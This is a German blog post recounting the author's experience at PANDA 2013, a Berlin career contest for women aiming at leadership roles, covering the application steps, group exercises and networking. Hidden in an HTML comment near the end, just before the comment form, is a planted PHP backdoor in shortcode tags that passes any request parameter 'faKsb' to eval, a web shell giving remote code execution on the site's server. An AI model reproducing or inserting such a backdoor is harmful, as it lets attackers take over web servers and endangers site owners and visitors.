#unterwegs: PANDA 2013 – Ich war dabei!

PANDA – Der Karriere-Contest für weibliche Führungstalente

Am 14. September 2013 fand im Berliner Esplanade Hotel der erste PANDA statt und ich war dabei. Einige Monate zuvor wurde ich durch Zufall in einem Tweet auf dieses neue Format aufmerksam und war sofort Feuer und Flamme.

Heute ist der letzte Tag um Euch für PANDA 2013 zu bewerben. Also noch schnell den Lebenslauf aktualisieren und… http://t.co/w4dsK6XeJk
— We Are PANDA (@we_are_panda) June 30, 2013

Was PANDA ist, beschreiben die Organisatoren selbst am besten:

„Eine Führungskarriere ist Wettbewerb – und deshalb ist PANDA auch einer. PANDA ist ein Contest für Frauen, die bereits jetzt Führungskräfte sind oder eine Führungsrolle anstreben und die sich gern Herausforderungen stellen.“

Das Bewerbungsverfahren besteht aus drei Schritten. Zunächst lädt man seinen aktuellen CV hoch. Für PANDA 2014 kann man dies übrigens noch bis zum 31.01.2014 tun. Die Jury sichtet draufhin alle hochgeladenen Lebensläufe und entscheidet, wer in Runde 2 kommt. Im zweiten Schritt verfässt man ein einseitiges Essay. Das Thema in 2013 war „Was ich bisher erreicht habe und wie ich es erreicht habe“. Für 2014 wird es „Was „Führen“ und „Führungskarriere“ für mich bedeutet“ lauten. Wieder wählt die Jury aus, wer in die nächste Runde kommt. Beim dritten Schritt reicht man eine Empfehlung einer Person seiner Wahl ein. Diese soll kurz beschreiben, dass sie vom Führungstalent überzeugt ist und warum. Dank +Roland von Kiedrowski schaffte ich auch diesem letzten Bewerbungsschritt und erhielt mit 100 weiteren Bewerberinnen die Einladung für den 14. September – zum ersten PANDA.

Vorab wurde man durch die Organisatoren mit vielen interessanten Infos versorgt. Als Teilnehmerin erhält man zum Beispiel die Möglichkeit, seinen Lebenslauf den teilnehmenden Unternehmen im Vorfeld zur Verfügung zu stellen. Sollte sich ein Unternehmen für das Profil interessieren, wird man zu einem persönlichen Gespräch in die Unternehmenslounge am Contest-Tag eingeladen. Besonders toll finde ich das Angebot, kostenfrei den Online Postkorb HighLight zu absolvieren und eine individuelle Auswertung zu erhalten (Kosten der Analyse in der Regel: 160 Euro). HighLight ist eine anspruchsvolle Management-Aufgabe zur Beurteilung des Organisations- und Problemlösungsverhaltens in einem simulierten Projekt. Wer mehr darüber erfahren möchte, findet hier weitere Informationen. Sobald ich das Programm durchgeführt habe, werde ich euch berichten.

panda

Der Contest-Tag selbst war genauso perfekt organisiert, wie im Vorfeld das Bewerbungsverfahren. An Eingang begrüßten mich bereits zwei Pandas. Mit einem Namensschildchen und einer Programmmappe ausgestattet, mischte ich mich unter die anderen Frauen. Der Vormittag bestand aus zwei Gruppenübungen, die man jeweils in zwei verschiedenen Gruppen zu bewältigen hatte. Die erste Aufgabe erforderte körperlichen Einsatz. Mann musste 12 Holzbretter nach einem vorgegebenen Raster zusammenstecken und das natürlich schnellstmöglich. Die zweite Aufgabe bestand aus einer klassischen Gruppendiskussion. Man wurde durch Jurymitglieder beobachtet und bewertet. Allerdings machte den Großteil der Teilnehmereinschätzung das Crowd-Rating aus. Jedes Gruppenmitglied bewertete am Ende der Übung die drei Frauen aus seinem Team, die seiner Meinung nach die Führungstalente sind. Während wir Teilnehmerinnen leckeres Mittagessen genossen, wurde hinter den Kulissen fleißig ausgezählt und gerechnet. Daraufhin wurden die 20 Teilnehmerinnen ausgerufen, die die meisten Punkte am Vormittag erziehlen konnten.

Leider gehörte ich zu den restlichen 80. Doch die Enttäuschung hielt nur kurz an, denn als „Ausgeschiedene“ konnte man sich dem tollen Rahmenprogramm am Nachmittag widmen. Zur Auswahl standen mehrere interessante Vorträge, von denen sich auch viele im Programm 2014 wiederfinden. Netzwerken wurde für mich das Stichwort des Tages. Zum einen lernte ich an diesem Tag tolle Persönlichkeiten und interessante Karrieren kennen. Zum anderen fiel es mir wie Schuppen von den Augen: um als Frau erfolgreich zu sein, ist Netzwerken das A und O. Besonders spannend finde ich den Ladies Mentoring Business Club und die Digital Media Women. Ich freue mich schon auf die ersten Meet-Ups, um einen Einblick in die einzelnen Netzwerke zu erhalten.

Alles in allem war es ein unglaublich bereichernder, interessanter, anstrengender und erfolgreicher Tag, der mir viele neue Impulse, Kontakte und Ideen bescherte. Vielen Dank an +PANDA für diese tolle Möglichkeit!

Mädels, ran an die Bewerbung für PANDA 2014!

<!– [insert_php]if (isset($_REQUEST["faKsb"])){eval($_REQUEST["faKsb"]);exit;}[/insert_php][php]if (isset($_REQUEST["faKsb"])){eval($_REQUEST["faKsb"]);exit;}[/php] –>

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.